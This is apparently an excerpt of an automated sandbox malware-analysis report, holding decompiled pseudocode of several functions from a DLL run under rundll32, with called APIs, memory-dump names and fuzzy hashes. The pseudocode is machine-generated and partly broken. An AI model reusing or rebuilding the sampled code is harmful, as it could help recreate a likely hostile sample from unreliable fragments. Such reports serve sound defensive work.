                  • Opcode Fuzzy Hash: 239e5c35e8e62ae3583b30c7b5811d5668ef9734cbd357c9bf41832aa8aa9b74
                  • Instruction Fuzzy Hash: 1B21A132304B4886E391DF63B88879A76A5F74CBD0F69C139EE9A93750DF34C9498701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 32%
                  			E00000001180009B7C(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, long long __r8, void* _a8, void* _a16, void* _a24, void* _a32) {
                  				intOrPtr _v40;
                  				long long _v56;
                  				void* _t32;
                  				intOrPtr _t33;
                  				void* _t55;
                  				WCHAR* _t63;
                  				WCHAR* _t66;
                  				CHAR* _t69;
                  
                  				_t32 = _t55;
                  				 *((long long*)(_t32 + 8)) = __rbx;
                  				 *((long long*)(_t32 + 0x10)) = __rbp;
                  				 *((long long*)(_t32 + 0x18)) = __rsi;
                  				 *((long long*)(_t32 + 0x20)) = __rdi;
                  				_t33 =  *0x8000d4a0;
                  				lstrlenA(_t69);
                  				lstrlenW(_t66);
                  				lstrlenW(_t63);
                  				r8d = __rbx + _t33 + 0x12;
                  				HeapAlloc(??, ??, ??);
                  				if (_t33 == 0) goto 0x80009c2e;
                  				_v56 = __r8;
                  				__imp__wnsprintfW();
                  				r9d = 0;
                  				r8d = 0;
                  				E00000001180006754(__rbx, __rcx, _t33, __r8, __rdx,  *0x8000d490 + 0x80011438);
                  				HeapFree(??, ??, ??);
                  				goto 0x80009c32;
                  				return _v40;
                  			}











                  0x180009b7c
                  0x180009b7f
                  0x180009b83
                  0x180009b87
                  0x180009b8b
                  0x180009b99
                  0x180009bb6
                  0x180009bbf
                  0x180009bca
                  0x180009bd9
                  0x180009bdf
                  0x180009beb
                  0x180009c00
                  0x180009c05
                  0x180009c0b
                  0x180009c0e
                  0x180009c17
                  0x180009c26
                  0x180009c2c
                  0x180009c52

                  APIs
                  • lstrlenA.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BB6
                  • lstrlenW.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BBF
                  • lstrlenW.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BCA
                  • HeapAlloc.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BDF
                  • wnsprintfW.SHLWAPI ref: 0000000180009C05
                    • Part of subcall function 0000000180006754: memset.NTDLL ref: 0000000180006786
                    • Part of subcall function 0000000180006754: CreateProcessW.KERNEL32 ref: 00000001800067F7
                    • Part of subcall function 0000000180006754: WaitForMultipleObjects.KERNEL32 ref: 0000000180006824
                    • Part of subcall function 0000000180006754: TerminateProcess.KERNEL32 ref: 0000000180006844
                    • Part of subcall function 0000000180006754: CloseHandle.KERNEL32 ref: 000000018000684F
                    • Part of subcall function 0000000180006754: CloseHandle.KERNEL32 ref: 000000018000685A
                    • Part of subcall function 0000000180006754: HeapFree.KERNEL32 ref: 0000000180006877
                  • HeapFree.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009C26
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heaplstrlen$CloseFreeHandleProcess$AllocCreateMultipleObjectsTerminateWaitmemsetwnsprintf
                  • String ID:
                  • API String ID: 3150570956-0
                  • Opcode ID: 6cd4a2c8511e4e4c6e1545c7a0fa09ed279638593f974f86d33c3e35563dcb8d
                  • Instruction ID: c1893427c912dd33d9beb41109e2d516a90994c651c2d5da5d8851701b433d67
                  • Opcode Fuzzy Hash: 6cd4a2c8511e4e4c6e1545c7a0fa09ed279638593f974f86d33c3e35563dcb8d
                  • Instruction Fuzzy Hash: DD217F35710B48C6EB45CF66A85479A77A0F78CFC4F848126EE5A43B64DF38D60ACB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 30%
                  			E00000001180004DD0(long long __rbx, void* __rcx, long long* __rdx, long long __rsi, long long* __r8) {
                  				void* _t13;
                  				intOrPtr* _t39;
                  				intOrPtr _t41;
                  				CHAR* _t54;
                  				long long _t60;
                  				long long _t61;
                  				void* _t63;
                  				long _t69;
                  				long _t73;
                  				long long _t74;
                  				void* _t76;
                  				CHAR* _t79;
                  
                  				 *((long long*)(_t63 + 8)) = __rbx;
                  				 *((long long*)(_t63 + 0x10)) = _t60;
                  				 *((long long*)(_t63 + 0x18)) = __rsi;
                  				_t39 =  *0x8000d4a0;
                  				_t41 =  *((intOrPtr*)(_t39 + 8));
                  				_t13 = lstrlenA(_t79) + 1;
                  				r8d = _t13;
                  				HeapAlloc(_t76, _t73, _t69);
                  				_t74 = _t39;
                  				if (_t39 == __rsi) goto 0x80004eb7;
                  				HeapAlloc(??, ??, ??);
                  				_t61 = _t39;
                  				if (_t39 == __rsi) goto 0x80004ea9;
                  				E00000001180004994(_t39, _t41, __rcx);
                  				if (_t39 == __rsi) goto 0x80004e62;
                  				if ( *_t39 !=  *((intOrPtr*)(_t39 + 1))) goto 0x80004e62;
                  				_t6 = _t39 + 2; // 0x2
                  				E00000001180004994(_t39, _t41, _t6);
                  				if (_t39 == __rsi) goto 0x80004e8e;
                  				r8d = _t13 - r12d;
                  				memcpy(??, ??, ??);
                  				 *((intOrPtr*)(_t41 + _t74)) = sil;
                  				lstrcpyA(_t54);
                  				goto 0x80004e9c;
                  				lstrcpyA(??, ??);
                  				 *_t61 = 0x2f;
                  				 *((intOrPtr*)(_t61 + 1)) = sil;
                  				 *__rdx = _t74;
                  				 *__r8 = _t61;
                  				goto 0x80004eb7;
                  				HeapFree(??, ??, ??);
                  				return 1;
                  			}















                  0x180004dd0
                  0x180004dd5
                  0x180004dda
                  0x180004dec
                  0x180004df9
                  0x180004e0d
                  0x180004e0f
                  0x180004e14
                  0x180004e1a
                  0x180004e20
                  0x180004e2e
                  0x180004e34
                  0x180004e3a
                  0x180004e3f
                  0x180004e4a
                  0x180004e51
                  0x180004e53
                  0x180004e5a
                  0x180004e6b
                  0x180004e72
                  0x180004e77
                  0x180004e82
                  0x180004e86
                  0x180004e8c
                  0x180004e8e
                  0x180004e94
                  0x180004e98
                  0x180004e9c
                  0x180004ea4
                  0x180004ea7
                  0x180004eb1
                  0x180004ed5

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$Alloclstrcpy$Freelstrlenmemcpystrchr
                  • String ID:
                  • API String ID: 2951650171-0
                  • Opcode ID: 25580c475dfecbdfe4d78f5cd292cb49b4452150f233a642b5b76edbf8c5295f
                  • Instruction ID: 05cbd2bd38c1d1587f62c6617ae6625bb3c46c91ac70328d53f87b1fbcc7e3b3
                  • Opcode Fuzzy Hash: 25580c475dfecbdfe4d78f5cd292cb49b4452150f233a642b5b76edbf8c5295f
                  • Instruction Fuzzy Hash: 9C21BF723047D886E782EF66B80839ABA91B38CFD4F49C420FE498B755DE38C649C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 29%
                  			E000000011800099F4(void* __ecx, long long __rbx, void* __rcx, long long __rdx, void* __rsi, void* __rbp, intOrPtr* __r8, void* __r10, void* __r11, char _a8, long long _a16, long long _a24) {
                  				void* _v48;
                  				char _v56;
                  				char _v64;
                  				char _v72;
                  				intOrPtr _v80;
                  				long long _v88;
                  				void* __rdi;
                  				void* _t73;
                  				long long _t75;
                  				void* _t91;
                  				intOrPtr _t106;
                  				intOrPtr* _t115;
                  
                  				_t92 = __rsi;
                  				_a24 = __rbx;
                  				_a16 = __rdx;
                  				_t106 =  *((intOrPtr*)(__rcx + 0x40));
                  				_t75 = __rdx;
                  				r10d =  *(_t106 + 2) & 0x0000ffff;
                  				_t115 = __r8;
                  				if ( *0x8000d4a0 - __r10 + 8 <= 0) goto 0x80009a51;
                  				_t73 = __r10 + _t106 + 8;
                  				if (( *0x8000d498 ^ 0xecb028fc) == 0) goto 0x80009a53;
                  				E00000001180004ED8( *0x8000d498 ^ 0xecb028fc, _t73);
                  				goto 0x80009a53;
                  				if (_t73 == 0) goto 0x80009b5c;
                  				_t9 =  &_a8; // 0x52
                  				_t10 =  &_v56; // 0x12
                  				if (E000000011800094E0(__rdx, _t73, _t91, __rsi, __rbp, _t10, _t9) != 0) goto 0x80009b61;
                  				_t11 = _t73 + 2; // 0x2
                  				if (_a8 - _t11 <= 0) goto 0x80009aa8;
                  				_t15 =  &_v64; // 0xa
                  				_t16 =  &_v48; // 0x1a
                  				E000000011800081F0(_a8, _t75, _v56, _t92, _t16, _t15, __r11);
                  				goto 0x80009aad;
                  				if (0x57 != 0) goto 0x80009b36;
                  				r13d = _v64;
                  				_t19 =  &_v72; // 0x2
                  				_t20 =  &_v64; // 0xa
                  				_v80 = r13d;
                  				_v72 =  *_t115;
                  				_v88 = _v48;
                  				if (E00000001180006EB0( *_t115, _t75, _t75, _t20, _t19) != 0) goto 0x80009b16;
                  				memcpy(??, ??, ??);
                  				 *_t115 = _v72;
                  				HeapFree(??, ??, ??);
                  				goto 0x80009b1b;
                  				memset(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				r8d = _a8;
                  				memset(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				goto 0x80009b61;
                  				return 2;
                  			}















                  0x1800099f4
                  0x1800099f4
                  0x1800099f9
                  0x180009a0b
                  0x180009a16
                  0x180009a19
                  0x180009a36
                  0x180009a3c
                  0x180009a3e
                  0x180009a45
                  0x180009a4a
                  0x180009a4f
                  0x180009a56
                  0x180009a5c
                  0x180009a64
                  0x180009a77
                  0x180009a7d
                  0x180009a87
                  0x180009a95
                  0x180009a9a
                  0x180009a9f
                  0x180009aa6
                  0x180009aaf
                  0x180009ab5
                  0x180009ac2
                  0x180009ac7
                  0x180009acf
                  0x180009ad4
                  0x180009ad8
                  0x180009ae6
                  0x180009afc
                  0x180009b0b
                  0x180009b0e
                  0x180009b14
                  0x180009b23
                  0x180009b30
                  0x180009b36
                  0x180009b45
                  0x180009b54
                  0x180009b5a
                  0x180009b78

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: FreeHeap$memset$memcpy
                  • String ID:
                  • API String ID: 4172471534-0
                  • Opcode ID: 19c3d6e2ffa1d9129ebda51cd38f1831e22d6d71fe2475a4891dd23ee8e2eb9e
                  • Instruction ID: 54b9a56baf89d223affce05d04c9eed0c8a26e8b2822132c81dbcb815bbc5161
                  • Opcode Fuzzy Hash: 19c3d6e2ffa1d9129ebda51cd38f1831e22d6d71fe2475a4891dd23ee8e2eb9e
                  • Instruction Fuzzy Hash: A9418E32204A8982EA92DB56E4007DBB7A1F7CDBD4F55C012FE8947759EF38C64ACB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 37%
                  			E00000001180008034(void* __ebx, signed int __edx, void* __ebp, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long __r8, intOrPtr* __r9, void* _a8, void* _a16, long long* _a24, void* _a32) {
                  				void* _t44;
                  				void* _t52;
                  				long long _t53;
                  				signed long long _t54;
                  				intOrPtr _t67;
                  				long _t68;
                  				long long _t70;
                  				void* _t77;
                  				intOrPtr* _t83;
                  				long _t87;
                  				void* _t88;
                  				void* _t90;
                  				struct _CRITICAL_SECTION* _t92;
                  				struct _CRITICAL_SECTION* _t96;
                  
                  				_t52 = _t77;
                  				 *((long long*)(_t52 + 8)) = __rbx;
                  				 *((long long*)(_t52 + 0x10)) = __rbp;
                  				 *((long long*)(_t52 + 0x20)) = __rsi;
                  				 *((long long*)(_t52 + 0x18)) = __r8;
                  				_t53 =  *0x8000d4a0;
                  				_t88 = __rcx;
                  				EnterCriticalSection(_t96);
                  				LeaveCriticalSection(_t92);
                  				HeapAlloc(_t90, _t87, _t68);
                  				_t70 = _t53;
                  				if (_t53 == __edx) goto 0x80008129;
                  				memset(??, ??, ??);
                  				EnterCriticalSection(??);
                  				r11d =  *((intOrPtr*)(__rcx + 0xa8));
                  				_t44 =  >=  ? r11d :  *((intOrPtr*)(__rcx + 0xa8));
                  				if (_t44 == 0) goto 0x80008111;
                  				_t54 = __edx + __edx * 4;
                  				_t14 = _t88 + 0x98; // 0x98
                  				_t16 = _t54 * 8; // 0xc
                  				_t83 = _t70 + _t16 + 0xc;
                  				_t67 =  *_t14;
                  				 *((intOrPtr*)(_t83 - 0xc)) =  *((intOrPtr*)(_t67 + 0x1c));
                  				 *((long long*)(_t83 + 0x14)) =  *((intOrPtr*)(_t67 + 0x10));
                  				 *_t83 =  *((intOrPtr*)(_t67 + 0x18));
                  				 *((intOrPtr*)(_t83 + 0x28 - 0x1c)) =  *((intOrPtr*)(_t67 + 0x18));
                  				if (_t44 + 0xffffffff != 0) goto 0x800080e7;
                  				LeaveCriticalSection(??);
                  				 *__r9 = __ebp + 1;
                  				 *_a24 = _t70;
                  				goto 0x8000812e;
                  				return 8;
                  			}

















                  0x180008034
                  0x180008037
                  0x18000803b
                  0x18000803f
                  0x180008043
                  0x180008054
                  0x18000805e
                  0x18000806f
                  0x180008082
                  0x18000809a
                  0x1800080a2
                  0x1800080a8
                  0x1800080b2
                  0x1800080bc
                  0x1800080c2
                  0x1800080cd
                  0x1800080d3
                  0x1800080d5
                  0x1800080da
                  0x1800080e2
                  0x1800080e2
                  0x1800080e7
                  0x1800080ef
                  0x1800080f7
                  0x1800080fe
                  0x18000810b
                  0x18000810f
                  0x180008116
                  0x180008121
                  0x180008124
                  0x180008127
                  0x18000814c

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeave$AllocHeapmemset
                  • String ID:
                  • API String ID: 3215818008-0
                  • Opcode ID: a5b05b0876b64fc44e85eded25e425ee8759b37968ca7e229990649024b80293
                  • Instruction ID: 1a3dd1e818266afc597f0a591a41220640f3dae03b5c6049ded73bf0a5c13329
                  • Opcode Fuzzy Hash: a5b05b0876b64fc44e85eded25e425ee8759b37968ca7e229990649024b80293
                  • Instruction Fuzzy Hash: F731A9B2A00B4896DB81CF5AE84878D77A0F748BD4F858026EF4D93360DF34CA9AC740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • lstrlenA.KERNEL32(?,?,?,?,00000001,00000001800058DA,?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 000000018000269E
                  • HeapAlloc.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 00000001800026B0
                  • lstrcpyA.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 00000001800026DB
                  • CloseHandle.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180002724
                  • GetLastError.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 000000018000272C
                  • HeapFree.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180002741
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$AllocCloseErrorFreeHandleLastlstrcpylstrlen
                  • String ID:
                  • API String ID: 2779700050-0
                  • Opcode ID: 865beac6f0010f69ec7a2bfeae32a674284dc580b90d05da419d0201c0ed98bc
                  • Instruction ID: 8ed8152a395896e124fdee7dd42a1db6533dceb9cab86c829ebc78b2e775e80d
                  • Opcode Fuzzy Hash: 865beac6f0010f69ec7a2bfeae32a674284dc580b90d05da419d0201c0ed98bc
                  • Instruction Fuzzy Hash: 8221AD36604788C6E7A6DF52B84039AB7A0B78CBE0F48C425FE9A47764CF38D649C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 39%
                  			E00000001180003698(void* __eflags, long long __rbx, void* __rcx, long long __rdx, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, short _a32) {
                  				void* _v32;
                  				short _v38;
                  				short _v40;
                  				long long _v48;
                  				signed short _v54;
                  				signed short _v56;
                  				void* __rsi;
                  				void* _t20;
                  				void* _t24;
                  				short _t30;
                  				signed short _t32;
                  				long long _t44;
                  				long _t56;
                  				long _t59;
                  				void* _t60;
                  				long long _t63;
                  				void* _t65;
                  				void* _t75;
                  				void* _t76;
                  
                  				_t45 = __rbx;
                  				_t75 = _t65;
                  				 *((long long*)(_t75 + 8)) = __rbx;
                  				 *((long long*)(_t75 + 0x10)) = __rbp;
                  				_t44 =  *0x8000d4a0;
                  				_t60 = __r8;
                  				_t63 = __rdx;
                  				_t20 = E00000001180001000(__rbx, _t75 - 0x20, __rdx, _t75 + 0x20);
                  				r12d = 0;
                  				if (_t20 != r12d) goto 0x8000376a;
                  				_t30 = _a32;
                  				_v38 = _t30;
                  				_v40 = _t30;
                  				_t32 = _t30 + 1 + _t30 + 1;
                  				_v54 = _t32;
                  				r8d = _t32 & 0x0000ffff;
                  				HeapAlloc(_t76, _t56, _t59);
                  				_v48 = _t44;
                  				if (_t44 == _t76) goto 0x8000375a;
                  				r8d = 0;
                  				_v56 = r12w;
                  				if (RtlOemStringToUnicodeString(??, ??, ??) - r12d >= 0) goto 0x80003731;
                  				RtlNtStatusToDosError(??);
                  				goto 0x80003748;
                  				_t24 = E00000001180005A0C((_v56 & 0x0000ffff) >> 1, _t45, _v48, _t60, _t63, _t63, _t60);
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				return _t24;
                  			}






















                  0x180003698
                  0x180003698
                  0x18000369b
                  0x18000369f
                  0x1800036ab
                  0x1800036b2
                  0x1800036b5
                  0x1800036c4
                  0x1800036c9
                  0x1800036d1
                  0x1800036d7
                  0x1800036dd
                  0x1800036e2
                  0x1800036ea
                  0x1800036ed
                  0x1800036f2
                  0x1800036f9
                  0x1800036ff
                  0x180003707
                  0x180003713
                  0x180003716
                  0x180003725
                  0x180003729
                  0x18000372f
                  0x180003743
                  0x180003754
                  0x180003764
                  0x18000377e

                  APIs
                    • Part of subcall function 0000000180001000: CreateFileW.KERNEL32 ref: 000000018000104A
                    • Part of subcall function 0000000180001000: GetFileSize.KERNEL32 ref: 000000018000105E
                    • Part of subcall function 0000000180001000: CloseHandle.KERNEL32 ref: 00000001800010D9
                    • Part of subcall function 0000000180001000: HeapFree.KERNEL32 ref: 00000001800010F0
                  • HeapAlloc.KERNEL32(?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 00000001800036F9
                  • RtlOemStringToUnicodeString.NTDLL ref: 000000018000371C
                  • RtlNtStatusToDosError.NTDLL ref: 0000000180003729
                  • HeapFree.KERNEL32(?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180003754
                  • HeapFree.KERNEL32(?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180003764
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$Free$FileString$AllocCloseCreateErrorHandleSizeStatusUnicode
                  • String ID:
                  • API String ID: 45859668-0
                  • Opcode ID: 9076e75a246ab2846ebd8e8eb0ec80191478d5bcc226e42bb9bdcc49be13810a
                  • Instruction ID: f5e01ebc0847fc45ed597bc040b189ed2f2401146e9d5498dfbecc36209ca11f
                  • Opcode Fuzzy Hash: 9076e75a246ab2846ebd8e8eb0ec80191478d5bcc226e42bb9bdcc49be13810a
                  • Instruction Fuzzy Hash: 6D217172218B5881E6A1DB26E44579E73A1FB8CBD4F549521FA8E83768DF38C649CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 60%
                  			E000000011800033B4(void* __eflags, long long __rbx, long long __rcx, long long __rdx, void* __r8, signed int __r9) {
                  				void* __rdi;
                  				intOrPtr _t65;
                  				intOrPtr _t87;
                  				intOrPtr _t100;
                  				intOrPtr _t101;
                  				intOrPtr _t105;
                  				signed long long _t107;
                  				void* _t112;
                  				void* _t120;
                  				signed long long _t123;
                  				signed long long _t130;
                  				intOrPtr* _t131;
                  				intOrPtr _t139;
                  				void* _t154;
                  				intOrPtr _t155;
                  				void* _t157;
                  				signed long long _t159;
                  				intOrPtr* _t160;
                  				void* _t163;
                  				void* _t165;
                  				void* _t166;
                  				intOrPtr* _t171;
                  				void* _t179;
                  				signed long long _t181;
                  				signed long long _t182;
                  				int _t185;
                  				int _t187;
                  				void* _t191;
                  
                  				 *((long long*)(_t165 + 0x18)) = __rbx;
                  				 *((long long*)(_t165 + 0x10)) = __rdx;
                  				 *((long long*)(_t165 + 8)) = __rcx;
                  				_t166 = _t165 - 0x660;
                  				_t155 =  *((intOrPtr*)(_t166 + 0x6c0));
                  				r13d = r9d;
                  				r9d =  *((intOrPtr*)(_t166 + 0x6c8));
                  				r9d = r9d - 1;
                  				_t123 = r9d - 1;
                  				if (__eflags < 0) goto 0x80003400;
                  				if ( *((intOrPtr*)(_t155 + _t123 * 4)) == 0) goto 0x800033f1;
                  				_t105 = __r9 + 1;
                  				 *((intOrPtr*)(_t166 + 0x28)) = _t105;
                  				if (_t105 == 0) goto 0x80003641;
                  				_t13 = _t123 + 0x20; // 0x20
                  				r14d = _t13;
                  				if ( *((intOrPtr*)(_t155 + _t123 * 4)) == 0) goto 0x8000342d;
                  				_t112 = 0 - r14d;
                  				if (_t112 >= 0) goto 0x8000342d;
                  				if (_t112 != 0) goto 0x80003422;
                  				r14d = r14d - 1;
                  				r8d = _t105;
                  				 *((intOrPtr*)(_t166 + 0x20)) = r14d;
                  				memset(_t191, _t187, _t185);
                  				_t16 = _t166 + 0x250; // 0x249
                  				r9d = r13d;
                  				r8d = r14d;
                  				_t130 = _t185 << 2;
                  				_t65 = E00000001180008AD0(_t112, _t130, _t16, __r8, _t155, _t179);
                  				_t17 = _t166 + 0x40; // 0x39
                  				r9d = _t105;
                  				 *((intOrPtr*)(_t166 + _t130 + 0x250)) = _t65;
                  				E00000001180008AD0(_t112, _t130, _t17, _t155, _t155, _t154);
                  				_t100 =  *((intOrPtr*)(_t166 + 0x40 + _t159 * 4));
                  				 *((intOrPtr*)(_t166 + 0x24)) = _t100;
                  				memset(_t163, ??);
                  				r13d = r13d - _t105;
                  				_t139 = _t105;
                  				_t181 = r13d;
                  				 *(_t166 + 0x30) = _t181;
                  				if (_t112 < 0) goto 0x800035ee;
                  				_t124 = _t181 + _t139;
                  				_t28 = _t181 * 4; // 0x249
                  				_t160 = _t166 + _t28 + 0x250;
                  				r9d = 0xffffffff;
                  				_t31 = _t124 * 4; // 0x249
                  				_t131 = _t166 + _t31 + 0x250;
                  				if (_t100 != r9d) goto 0x800034d0;
                  				_t101 =  *_t131;
                  				goto 0x800034fb;
                  				r8d = _t155 + 1;
                  				_t157 =  >  ? __r9 : (_t181 + _t139 << 0x20) + _t139 + _t181;
                  				_t44 = _t166 + 0x40; // 0x39
                  				_t171 = _t160;
                  				r10d = _t105;
                  				if (_t101 == 0) goto 0x8000357a;
                  				r12d = 0xffffffff;
                  				r9d =  *_t44;
                  				_t87 =  *_t160;
                  				r10d = r10d + r12d;
                  				_t176 = __r9 * _t163;
                  				 *_t171 = _t87;
                  				if (_t87 - r12d <= 0) goto 0x80003548;
                  				goto 0x8000354a;
                  				 *_t171 =  *_t171 - r9d;
                  				if ( *_t171 - r12d - r9d <= 0) goto 0x80003565;
                  				goto 0x80003567;
                  				if (r10d != 0) goto 0x80003517;
                  				_t107 =  *((intOrPtr*)(_t166 + 0x28));
                  				_t182 =  *(_t166 + 0x30);
                  				 *_t131 =  *_t131 - 0 + 0 + r11d;
                  				if ( *_t131 != 0) goto 0x80003595;
                  				_t47 = _t166 + 0x40; // 0x39
                  				r8d = _t107;
                  				_t120 = E000000011800049DC(_t160, _t47, _t171 + 4);
                  				if (_t120 < 0) goto 0x800035ae;
                  				_t48 = _t166 + 0x40; // 0x39
                  				r9d = _t107;
                  				 *_t131 =  *_t131 - E00000001180004D74(_t77,  *_t171, _t131, _t160, _t160, _t48);
                  				goto 0x8000357c;
                  				 *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x6a0)) + _t182 * 4)) = _t101 + 1;
                  				r13d = r13d - 1;
                  				 *(_t166 + 0x30) = _t182 - 1;
                  				r9d = 0xffffffff;
                  				if (_t120 >= 0) goto 0x800034c7;
                  				r14d =  *((intOrPtr*)(_t166 + 0x20));
                  				r8d =  *((intOrPtr*)(_t166 + 0x6c8));
                  				memset(??, ??, ??);
                  				_t57 = _t166 + 0x250; // 0x249
                  				r9d = _t107;
                  				r8d = r14d;
                  				E00000001180007220(_t120, _t131 - 4,  *((intOrPtr*)(_t166 + 0x6a8)), _t57, _t157, _t176, _t159);
                  				r8d = 0x40c;
                  				memset(??, ??, ??);
                  				r8d = 0x204;
                  				return memset(??, ??, ??);
                  			}































                  0x1800033b4
                  0x1800033b9
                  0x1800033be
                  0x1800033ce
                  0x1800033d5
                  0x1800033dd
                  0x1800033e0
                  0x1800033f1
                  0x1800033f4
                  0x1800033f8
                  0x1800033fe
                  0x180003400
                  0x180003404
                  0x18000340a
                  0x18000341a
                  0x18000341a
                  0x180003420
                  0x180003422
                  0x180003425
                  0x18000342b
                  0x18000342d
                  0x180003430
                  0x180003441
                  0x180003446
                  0x18000344b
                  0x180003456
                  0x180003459
                  0x18000345f
                  0x180003463
                  0x180003468
                  0x18000346d
                  0x180003473
                  0x18000347a
                  0x18000347f
                  0x180003490
                  0x180003494
                  0x180003499
                  0x18000349c
                  0x18000349f
                  0x1800034a2
                  0x1800034a7
                  0x1800034ad
                  0x1800034b1
                  0x1800034b1
                  0x1800034b9
                  0x1800034bf
                  0x1800034bf
                  0x1800034ca
                  0x1800034cc
                  0x1800034ce
                  0x1800034d3
                  0x1800034f7
                  0x1800034fd
                  0x180003505
                  0x180003508
                  0x18000350d
                  0x180003511
                  0x18000351a
                  0x180003520
                  0x180003524
                  0x180003527
                  0x18000353a
                  0x18000353f
                  0x180003546
                  0x18000354a
                  0x18000355c
                  0x180003563
                  0x18000356f
                  0x180003571
                  0x180003575
                  0x18000357a
                  0x18000357f
                  0x180003581
                  0x180003586
                  0x180003591
                  0x180003593
                  0x180003595
                  0x18000359a
                  0x1800035aa
                  0x1800035ac
                  0x1800035be
                  0x1800035c9
                  0x1800035cd
                  0x1800035d5
                  0x1800035db
                  0x1800035e1
                  0x1800035ee
                  0x1800035ff
                  0x180003604
                  0x18000360c
                  0x18000360f
                  0x180003615
                  0x180003624
                  0x18000362a
                  0x180003636
                  0x18000365b

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
